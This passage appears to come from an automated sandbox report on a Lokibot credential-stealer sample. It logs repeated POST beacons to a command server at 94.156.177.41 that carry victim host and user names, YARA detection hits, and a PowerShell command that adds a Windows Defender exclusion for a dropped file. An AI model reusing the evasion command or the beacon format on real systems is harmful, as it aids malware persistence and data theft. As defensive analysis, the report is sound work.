                                    Nov 28, 2024 13:53:32.490597963 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:53:33.909647942 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:53:33 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    48192.168.2.54991394.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:53:34.192893982 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:53:34.319262028 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:53:35.791979074 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:53:35 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    49192.168.2.54991794.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:53:36.054059029 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:53:36.174268961 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:53:37.671386003 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:53:37 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    50192.168.2.54992394.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:53:37.929605961 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:53:38.049670935 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:53:39.517520905 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:53:39 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    51192.168.2.54992894.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:53:39.773238897 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:53:39.893532991 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:53:41.214277029 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:53:40 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    52192.168.2.54993194.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:53:41.917542934 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:53:42.038877010 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:53:43.432657003 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:53:43 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    53192.168.2.54993694.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:53:43.694153070 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:53:43.814507961 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:53:45.291156054 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:53:45 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    54192.168.2.54994294.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:53:45.557185888 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:53:45.677206993 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:53:47.149077892 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:53:46 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    55192.168.2.54994894.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:53:47.437643051 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:53:47.609817028 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:53:48.834009886 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:53:48 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    56192.168.2.54995194.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:53:49.103429079 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:53:49.229391098 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:53:50.737694979 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:53:50 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    57192.168.2.54995494.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:53:51.008164883 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:53:51.134807110 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:53:52.603863001 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:53:52 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    58192.168.2.54995994.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:53:52.867790937 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:53:52.989362955 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:53:54.504672050 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:53:54 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    59192.168.2.54996594.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:53:54.772973061 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:53:54.895597935 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:53:56.356708050 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:53:56 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    60192.168.2.54997094.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:53:56.646739006 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:53:56.768163919 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:53:58.089629889 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:53:57 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    61192.168.2.54997594.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:53:58.352627993 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:53:58.476191998 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:53:59.992137909 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:53:59 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    62192.168.2.54997994.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:54:00.416253090 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:54:00.536336899 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:54:01.812099934 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:54:01 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    63192.168.2.54998494.156.177.41801496C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 28, 2024 13:54:02.071367025 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: 94.156.177.41
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: F4FE624
                                    Content-Length: 153
                                    Connection: close
                                    Nov 28, 2024 13:54:02.191446066 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                    Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
                                    Nov 28, 2024 13:54:03.511610985 CET193INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.1
                                    Date: Thu, 28 Nov 2024 12:54:03 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    X-Powered-By: PHP/5.4.16
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:0
                                    Start time:07:51:56
                                    Start date:28/11/2024
                                    Path:C:\Users\user\Desktop\FVR-N2411-07396.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\FVR-N2411-07396.exe"
                                    Imagebase:0x690000
                                    File size:601'088 bytes
                                    MD5 hash:2F402635E17B4F0D9C0D6922D384936A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2071531160.0000000005540000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2053219827.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low
                                    Has exited:true

                                    Target ID:3
                                    Start time:07:52:00
                                    Start date:28/11/2024
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe"
                                    Imagebase:0x790000
                                    File size:433'152 bytes
                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:4
                                    Start time:07:52:00
                                    Start date:28/11/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
